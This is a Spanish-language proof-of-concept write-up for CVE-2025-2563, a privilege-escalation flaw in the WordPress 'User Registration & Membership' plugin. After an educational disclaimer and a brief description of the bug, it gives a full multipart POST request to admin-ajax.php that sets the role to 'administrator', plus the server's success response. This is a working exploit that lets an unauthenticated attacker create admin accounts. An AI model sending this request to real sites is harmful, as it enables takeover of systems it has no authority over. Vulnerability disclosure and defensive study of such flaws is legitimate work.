
CVE-2025-2563 PoC
La información presentada en este informe de CVE (Common Vulnerabilities and Exposures) tiene fines exclusivamente educativos e informativos. Los detalles proporcionados se basan en recursos disponibles públicamente, investigaciones y análisis realizados por el autor. El contenido no pretende promover ni fomentar actividades ilegales, incluida la piratería informática, la explotación o el acceso no autorizado a sistemas.
El autor no asume ninguna responsabilidad por el mal uso de la información presentada. Se recomienda que las personas y organizaciones apliquen este conocimiento de manera responsable y conforme a las leyes y regulaciones aplicables. Se recomienda encarecidamente a los lectores que prueben las vulnerabilidades únicamente en entornos controlados y con la debida autorización.
El autor y los colaboradores de este informe no respaldan ni apoyan actividades maliciosas y fomentan la divulgación responsable y las prácticas éticas de hacking.
Se ha descubierto una vulnerabilidad de seguridad crítica en el plugin de WordPress "User Registration & Membership", una herramienta popular para crear sitios de membresía y formularios de registro. La falla, identificada como CVE-2025-2563, tiene una puntuación CVSS de 9.8, lo que indica su alta severidad.
El plugin User Registration & Membership para WordPress es vulnerable a la escalada de privilegios en versiones hasta la 4.1.1 inclusive. Esto se debe a restricciones insuficientes en el tipo de rol en la función 'prepare_members_data()'. Esto permite que atacantes no autenticados creen nuevas cuentas de usuario con el rol de 'administrator', bajo estas condiciones:
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335
Content-Disposition: form-data; name="action"
user_registration_membership_register_member
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
{
"success": true,
"data": {
"member_id": 24,
"transaction_id": "",
"message": "New member has been successfully created."
}
}
- https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
- https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/